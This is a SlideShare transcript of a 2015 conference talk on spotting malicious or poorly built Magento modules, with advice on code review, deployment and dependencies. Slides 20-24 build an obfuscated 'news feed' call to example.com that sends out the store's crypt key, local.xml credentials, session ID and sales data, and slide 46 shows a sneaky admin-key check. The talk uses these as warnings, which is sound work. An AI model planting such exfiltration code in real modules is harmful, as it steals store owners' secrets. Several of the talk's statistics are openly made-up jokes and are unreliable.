Downloaded 26 times
![!is_null($adminKey) && $adminKey != ''
&& $request['auth']['admin_key'] = $adminKey;
Don’t Be
fancy](https://image.slidesharecdn.com/evilmodule-150511235746-lva1-app6891/75/How-to-Build-a-Pure-Evil-Magento-Module-46-2048.jpg)
Uploaded byAOE
How to Build a Pure Evil Magento Module
The document discusses the risks associated with installing Magento modules, emphasizing the importance of avoiding malicious or poorly designed code. It encourages developers to improve their practices and take security seriously, while also highlighting the complexities of managing dependencies and version control. Ultimately, it stresses the importance of thoroughly reviewing and testing code before deployment to ensure a secure and reliable environment.
More Related Content
Similar to How to Build a Pure Evil Magento Module
![php[world] Magento101](https://cdn.slidesharecdn.com/ss_thumbnails/phpworld-magento101-151118144537-lva1-app6892-thumbnail.jpg?width=640&height=640&fit=bounds)
![Vibe Coding vs. Spec-Driven Development [Free Meetup]](https://cdn.slidesharecdn.com/ss_thumbnails/vibecodingvsspecdrivendevelopment-251209105622-43f455e7-thumbnail.jpg?width=640&height=640&fit=bounds)
How to Build a Pure Evil Magento Module
- 1. Pure Evil How toBuild a Meet Magento 2015 – Leipzig, Germany Fabrizio Branca Magento Module
- 3.
- 4.
- 5.
- 6. 87.44%*of all modules (bothpaid or free) are known to be a major risk
- 7. *Note: Some statistics inthis presentation may or may not be randomly made up based on wild guesses.
- 8. Goals help you spot evilmodules and avoid installing them 1 motivate vendors to rethink their “best practices” 2 make YOU write better modules 3
- 9. Disclaimer: Persons (or Companies) Livingor Dead Is Purely Coincidental Any Similarity to
- 10. Magento Module How toBuild a Pure Evil in 51 simple steps Okay, let’s get started: 7
- 11.
- 12.
- 13.
- 14.
- 15.
- 16.
- 17.
- 18.
- 19.
- 20. “http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version'=> Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date') )))));
- 21. “http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version'=> Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage() )))));
- 22. “http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version'=> Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key') )))));
- 23. “http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version'=> Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key'), 'local.xml' => file_get_contents('app/etc/local.xml') )))));
- 24. “http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version'=> Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key'), 'local.xml' => file_get_contents('app/etc/local.xml'), 'session_id' => Mage::getSingleton('core/session')->getEncryptedSessionId() )))));
- 25. You need totrust EVERY. SINGLE. LINE. you deploy to your server!
- 26. Average number ofmodules ~10 Launch >100 After 2 years per Magento store https://twitter.com/ProductPaul/status/584393641575088128 Note: sample size may or may not be significant.
- 27.
- 28.
- 29. Chances your moduleends up on an installation with … …more products than on your devbox …a higher order volume than on your devbox …more concurrent users than on your devbox 73.25% 80.77% 98.53%
- 30.
- 31. Assume all instances Problem: sharea file system
- 32. If your infrastructure looksmore like this:
- 33. Route 53 ELB CloudFront: Theme (JS/CSS,…) CloudFront: mediafiles Internet S3: media files S3: build packages Continuous Integration Pipeline (Jenkins) OpsWorks Availability Zone AWS CloudFormation CloudWatch ✓ ✓inherently fault tolerant ✓ ✓ ✓ ✓ ✓ Redis: Sessions Redis: Cache Backend RDS DB instance RDS DB instance standby (Multi-AZ) ✓ ✓ Auto Scaling Group Frontend Layer Backend Layer Worker Layer Varnish Layer Data Layer RDS DB Read replica (for reports) Redis: Full page cache backend ✓ Production Stack External Services (Fulfillment, DRM, Giftcards,…) SES: Transactional emails ✓ SQS: Queue ✓ “Stack” (= Environment) “Layers” App Instances
- 34.
- 35.
- 36. then you mostlikely don’t have a shared file system
- 37. Please do notlet your “configurable theme” dynamically generate skin files with custom CSS values.
- 38. How do youhandle… version control? multi-server setups? auto-scaling? file permissions?
- 39.
- 40.
- 41. Rewrites of importantclasses Overwrites Core Hacks Events Framework behavior Core Concepts Compilation … Don’t mess with Magento …unless this is what your module is all about
- 43.
- 44.
- 45. foreach ($collection as$product) { /* @var $product Mage_Core_Model_Product */ ... } Be specific
- 46. !is_null($adminKey) && $adminKey!= '' && $request['auth']['admin_key'] = $adminKey; Don’t Be fancy
- 47. I don’t alwaystest my code. But when I do I do it on production.
- 48.
- 49. Jenkins Travis CI UseJenkins to implement a full deployment pipeline for your projects! Test our Open Source Magento modules with Travis CI!
- 50. Dependencies PHP version & extensions 3rdparty libraries 3rd party services other Magento modules
- 51. 1. Avoid Dependencies 2.Declare Dependencies any dependency increases the complexity significantly
- 57.
- 59.
- 60.
- 61.
- 62.
- 63. discover use code review add modman add composer git integratetest deploy The Right Thing™ download good luck with that! pay $xx to author provide FTP access seriously?! one-click install Module Installation upload “Step 1” upload “Step 2” clear caches
- 64. You need totrust EVERY. SINGLE. LINE. you deploy to your server!
- 65. How do youhandle… version control? multi-server setups? auto-scaling? file permissions?
- 66.
- 67. Find your sweetspot GitHub ionCube
- 68. Find your sweetspot GitHub ionCube
- 69. Find your sweetspot GitHub ionCube
- 70.
- 71. Forecast risk a new modulecrashes your store developer happiness
- 72. http://freakonomics.com/2015/01/15/thats-a-great-question-a-new-freakonomics-radio-podcast/ Chances a speakerbegins his answer with “That’s a great question!”(...even if the question wasn’t that great.) 78.84% USA 23.47% Europe
- 73. Thank you! http://www.aoe.com http://fbrnc.net @fbrnc Follow meon twitter! My blog